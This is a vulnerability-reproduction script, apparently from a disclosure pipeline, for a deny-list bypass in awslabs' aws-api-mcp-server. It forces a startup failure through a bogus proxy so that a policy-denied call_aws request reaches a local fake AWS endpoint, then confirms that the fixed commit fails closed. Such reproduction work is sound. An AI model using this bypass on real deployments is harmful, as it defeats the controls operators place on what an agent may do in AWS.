#!/bin/bash
set -euo pipefail

# Portable paths - works from any directory
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
REPRO_DIR="$ROOT/repro"
ARTIFACTS="$ROOT/artifacts/aws-api-mcp-repro"
mkdir -p "$LOGS" "$REPRO_DIR" "$ARTIFACTS"

cd "$ROOT"
MAIN_LOG="$LOGS/reproduction_steps.log"
: > "$MAIN_LOG"
exec > >(tee -a "$MAIN_LOG") 2>&1

write_manifest() {
  local target_reached="${1:-false}"
  local notes="${2:-run did not complete}"
  python3 - "$REPRO_DIR/runtime_manifest.json" "$target_reached" "$notes" <<'PY'
import json, sys
path, target, notes = sys.argv[1], sys.argv[2].lower() == 'true', sys.argv[3]
artifacts = [
    'logs/reproduction_steps.log',
    'logs/repro/vulnerable_attempt_1.json',
    'logs/repro/vulnerable_attempt_2.json',
    'logs/repro/fixed_attempt_1.json',
    'logs/repro/fixed_attempt_2.json',
    'logs/repro/vulnerable_attempt_1_server.log',
    'logs/repro/fixed_attempt_1_server.log',
]
json.dump({
    'entrypoint_kind': 'cli_command',
    'entrypoint_detail': 'awslabs.aws-api-mcp-server stdio startup with failed read-operations index, then MCP call_aws tool request',
    'service_started': target,
    'healthcheck_passed': target,
    'target_path_reached': target,
    'runtime_stack': ['python', 'awslabs.aws-api-mcp-server', 'MCP stdio', 'botocore', 'local fake AWS HTTP endpoint'],
    'proof_artifacts': artifacts,
    'notes': notes,
}, open(path, 'w'), indent=2)
PY
}
trap 'write_manifest false "reproduction_steps.sh exited before completing all proof checks"' ERR
write_manifest false "reproduction starting"

CACHE_CONTEXT="$ROOT/project_cache_context.json"
PROJECT_CACHE_DIR=""
if [ -r "$CACHE_CONTEXT" ]; then
  PROJECT_CACHE_DIR="$(python3 - "$CACHE_CONTEXT" <<'PY'
import json, sys
try:
    data=json.load(open(sys.argv[1]))
    print(data.get('project_cache_dir','') if data.get('prepared') else '')
except Exception:
    print('')
PY
)"
fi
if [ -n "$PROJECT_CACHE_DIR" ]; then
  REPO="$PROJECT_CACHE_DIR/repo"
else
  REPO="$ROOT/artifacts/awslabs-mcp/repo"
fi
mkdir -p "$(dirname "$REPO")" "$ROOT/logs/repro"

FIXED_COMMIT="ab1bbebc097d674c1cdd4bd75a8f313be18473bf"
if [ ! -d "$REPO/.git" ]; then
  git clone --filter=blob:none https://github.com/awslabs/mcp.git "$REPO"
else
  git -C "$REPO" fetch --all --tags --prune
fi
VULN_COMMIT="$(git -C "$REPO" rev-parse "$FIXED_COMMIT^")"
FIXED_RESOLVED="$(git -C "$REPO" rev-parse "$FIXED_COMMIT")"
echo "Vulnerable commit: $VULN_COMMIT"
echo "Fixed commit:      $FIXED_RESOLVED"

PATCH_LOG="$LOGS/repro/patch_presence.log"
{
  echo "=== vulnerable policy block ==="
  git -C "$REPO" show "$VULN_COMMIT:src/aws-api-mcp-server/awslabs/aws_api_mcp_server/server.py" | sed -n '318,336p'
  echo "=== fixed policy block ==="
  git -C "$REPO" show "$FIXED_RESOLVED:src/aws-api-mcp-server/awslabs/aws_api_mcp_server/server.py" | sed -n '318,338p'
  echo "=== vulnerable startup failure handling ==="
  git -C "$REPO" show "$VULN_COMMIT:src/aws-api-mcp-server/awslabs/aws_api_mcp_server/server.py" | sed -n '438,448p'
  echo "=== fixed startup failure handling ==="
  git -C "$REPO" show "$FIXED_RESOLVED:src/aws-api-mcp-server/awslabs/aws_api_mcp_server/server.py" | sed -n '443,454p'
} > "$PATCH_LOG"
cat "$PATCH_LOG"

git -C "$REPO" show "$VULN_COMMIT:src/aws-api-mcp-server/awslabs/aws_api_mcp_server/server.py" | grep -q "if READ_OPERATIONS_INDEX is not None"
git -C "$REPO" show "$FIXED_RESOLVED:src/aws-api-mcp-server/awslabs/aws_api_mcp_server/server.py" | grep -q "enforcement data failed to initialize"

BUILD_DIR="$PROJECT_CACHE_DIR/build/aws-api-mcp-server-cve-2026-16584"
if [ -z "$PROJECT_CACHE_DIR" ]; then
  BUILD_DIR="$ARTIFACTS/build"
fi
mkdir -p "$BUILD_DIR"
VULN_SRC="$BUILD_DIR/vuln-src"
FIXED_SRC="$BUILD_DIR/fixed-src"
rm -rf "$VULN_SRC" "$FIXED_SRC"
git -C "$REPO" archive "$VULN_COMMIT" src/aws-api-mcp-server | tar -x -C "$BUILD_DIR"
mv "$BUILD_DIR/src/aws-api-mcp-server" "$VULN_SRC"
git -C "$REPO" archive "$FIXED_RESOLVED" src/aws-api-mcp-server | tar -x -C "$BUILD_DIR"
mv "$BUILD_DIR/src/aws-api-mcp-server" "$FIXED_SRC"

VENV="$BUILD_DIR/venv"
if [ ! -x "$VENV/bin/python" ]; then
  python3 -m venv "$VENV"
fi
"$VENV/bin/python" -m pip install --upgrade pip setuptools wheel >/dev/null
"$VENV/bin/python" -m pip install -e "$VULN_SRC" >/dev/null
"$VENV/bin/python" -m pip install pytest >/dev/null

HARNESS="$BUILD_DIR/mcp_policy_bypass_harness.py"
cat > "$HARNESS" <<'PY'
import asyncio
import contextlib
import json
import os
import pathlib
import socket
import sys
import tempfile
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer

from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client

ROOT = pathlib.Path(os.environ['PRUVA_ROOT'])
LOGS = ROOT / 'logs' / 'repro'
LOGS.mkdir(parents=True, exist_ok=True)

class FakeAwsHandler(BaseHTTPRequestHandler):
    calls = []
    def do_POST(self):
        length = int(self.headers.get('Content-Length', '0') or '0')
        body = self.rfile.read(length).decode('utf-8', 'replace')
        FakeAwsHandler.calls.append({'method': 'POST', 'path': self.path, 'headers': dict(self.headers), 'body': body})
        payload = '<GetCallerIdentityResponse xmlns="https://sts.amazonaws.com/doc/2011-06-15/"><GetCallerIdentityResult><Arn>arn:aws:iam::123456789012:user/pruva</Arn><UserId>PRUVA</UserId><Account>123456789012</Account></GetCallerIdentityResult><ResponseMetadata><RequestId>pruva-request</RequestId></ResponseMetadata></GetCallerIdentityResponse>'
        self.send_response(200)
        self.send_header('Content-Type', 'text/xml')
        self.send_header('Content-Length', str(len(payload)))
        self.end_headers()
        self.wfile.write(payload.encode())
    def log_message(self, fmt, *args):
        pass

def get_free_port():
    with socket.socket() as s:
        s.bind(('127.0.0.1', 0))
        return s.getsockname()[1]

async def run_attempt(role, attempt, src):
    src = pathlib.Path(src)
    FakeAwsHandler.calls = []
    port = get_free_port()
    httpd = HTTPServer(('127.0.0.1', port), FakeAwsHandler)
    thread = threading.Thread(target=httpd.serve_forever, daemon=True)
    thread.start()

    home = pathlib.Path(tempfile.mkdtemp(prefix=f'aws-api-mcp-{role}-{attempt}-'))
    policy_dir = home / '.aws' / 'aws-api-mcp'
    policy_dir.mkdir(parents=True, exist_ok=True)
    policy = {'policy': {'denyList': ['aws sts get-caller-identity'], 'elicitList': ['aws iam create-user']}}
    (policy_dir / 'mcp-security-policy.json').write_text(json.dumps(policy), encoding='utf-8')

    server_log = LOGS / f'{role}_attempt_{attempt}_server.log'
    cmd = [sys.executable, '-m', 'awslabs.aws_api_mcp_server.server']
    env = os.environ.copy()
    env.update({
        'PYTHONPATH': str(src),
        'HOME': str(home),
        'AWS_REGION': 'us-east-1',
        'AWS_DEFAULT_REGION': 'us-east-1',
        'AWS_ACCESS_KEY_ID': 'AKIAPRUVAEXAMPLE',
        'AWS_SECRET_ACCESS_KEY': 'pruva-secret-key',
        'AWS_SESSION_TOKEN': 'pruva-session-token',
        'FASTMCP_LOG_LEVEL': 'DEBUG',
        'TRANSPORT': 'stdio',
        # Force ServiceReferenceUrlsByService() to fail during startup, while preserving localhost for the fake AWS endpoint.
        'HTTPS_PROXY': 'http://127.0.0.1:9',
        'HTTP_PROXY': 'http://127.0.0.1:9',
        'NO_PROXY': '127.0.0.1,localhost',
        'no_proxy': '127.0.0.1,localhost',
        'AWS_EC2_METADATA_DISABLED': 'true',
    })
    cli_command = f'aws sts get-caller-identity --endpoint-url http://127.0.0.1:{port}'

    result = {
        'role': role,
        'attempt': attempt,
        'src': str(src),
        'cli_entrypoint': cmd,
        'policy_file': str(policy_dir / 'mcp-security-policy.json'),
        'configured_denyList': policy['policy']['denyList'],
        'forced_startup_failure': 'invalid proxy for read-operations ServiceReferenceUrlsByService requests',
        'requested_tool_command': cli_command,
        'server_started': False,
        'mcp_initialized': False,
        'tool_call_completed': False,
        'fake_aws_boundary_reached': False,
        'policy_denial_observed': False,
        'startup_fail_closed': False,
        'server_log': str(server_log.relative_to(ROOT)),
        'fake_aws_calls': [],
        'tool_result_text': None,
        'exception': None,
    }
    try:
        params = StdioServerParameters(command=cmd[0], args=cmd[1:], env=env)
        async with stdio_client(params, errlog=open(server_log, 'w', encoding='utf-8')) as (read, write):
            result['server_started'] = True
            async with ClientSession(read, write) as session:
                await asyncio.wait_for(session.initialize(), timeout=15)
                result['mcp_initialized'] = True
                try:
                    response = await asyncio.wait_for(session.call_tool('call_aws', {'cli_command': cli_command}), timeout=25)
                    result['tool_call_completed'] = True
                    result['tool_result_text'] = repr(response)
                except Exception as exc:
                    result['exception'] = repr(exc)
    except Exception as exc:
        result['exception'] = repr(exc)
    finally:
        with contextlib.suppress(Exception):
            httpd.shutdown()
        thread.join(timeout=2)
        result['fake_aws_calls'] = FakeAwsHandler.calls
        result['fake_aws_boundary_reached'] = bool(FakeAwsHandler.calls)
        log_text = ''
        with contextlib.suppress(Exception):
            log_text = server_log.read_text(encoding='utf-8', errors='replace')
        result['server_log_tail'] = log_text[-4000:]
        lower = (result.get('tool_result_text') or '') + '\n' + (result.get('exception') or '') + '\n' + log_text
        result['policy_denial_observed'] = 'denied by security policy' in lower
        result['startup_failure_observed'] = 'Failed to load read operations index' in log_text or 'Error retrieving the service reference document' in log_text
        result['startup_fail_closed'] = (not result['mcp_initialized']) and result['startup_failure_observed']
        out = LOGS / f'{role}_attempt_{attempt}.json'
        out.write_text(json.dumps(result, indent=2, default=str), encoding='utf-8')
        print(json.dumps({k: result[k] for k in ['role','attempt','server_started','mcp_initialized','tool_call_completed','startup_failure_observed','fake_aws_boundary_reached','policy_denial_observed','startup_fail_closed','exception']}, indent=2))
    return result

async def main():
    vuln_src = os.environ['VULN_SRC']
    fixed_src = os.environ['FIXED_SRC']
    results = []
    for attempt in (1, 2):
        results.append(await run_attempt('vulnerable', attempt, vuln_src))
    for attempt in (1, 2):
        results.append(await run_attempt('fixed', attempt, fixed_src))
    summary = {
        'vulnerable_all_bypassed': all(r['startup_failure_observed'] and r['mcp_initialized'] and r['fake_aws_boundary_reached'] and not r['policy_denial_observed'] for r in results if r['role']=='vulnerable'),
        'fixed_all_fail_closed': all(r['startup_failure_observed'] and not r['fake_aws_boundary_reached'] and (r['startup_fail_closed'] or r['policy_denial_observed'] or not r['mcp_initialized']) for r in results if r['role']=='fixed'),
        'results': results,
    }
    (LOGS / 'summary.json').write_text(json.dumps(summary, indent=2, default=str), encoding='utf-8')
    print('=== SUMMARY ===')
    print(json.dumps({k: summary[k] for k in ['vulnerable_all_bypassed','fixed_all_fail_closed']}, indent=2))
    if not (summary['vulnerable_all_bypassed'] and summary['fixed_all_fail_closed']):
        return 1
    return 0

if __name__ == '__main__':
    raise SystemExit(asyncio.run(main()))
PY

export PRUVA_ROOT="$ROOT" VULN_SRC="$VULN_SRC" FIXED_SRC="$FIXED_SRC"
"$VENV/bin/python" "$HARNESS"

# Preserve exact evidence metadata for downstream systems.
python3 - "$REPRO_DIR/proof_summary.json" "$LOGS/repro" <<'PY'
import hashlib, json, pathlib, sys
out=pathlib.Path(sys.argv[1]); logdir=pathlib.Path(sys.argv[2])
items=[]
for p in sorted(logdir.glob('*attempt*json')) + [logdir/'summary.json', logdir/'patch_presence.log']:
    if p.exists():
        data=p.read_bytes()
        items.append({'path': str(p.relative_to(pathlib.Path.cwd())), 'sha256': hashlib.sha256(data).hexdigest(), 'size': len(data)})
json.dump({'proof_files': items}, open(out,'w'), indent=2)
PY

write_manifest true "Confirmed: vulnerable commit continues after read-operations index startup failure and a denyList-blocked call_aws request reaches the fake AWS HTTP endpoint; fixed commit fails closed before the downstream boundary."
trap - ERR

echo "Reproduction confirmed. Key evidence:"
cat "$LOGS/repro/summary.json"
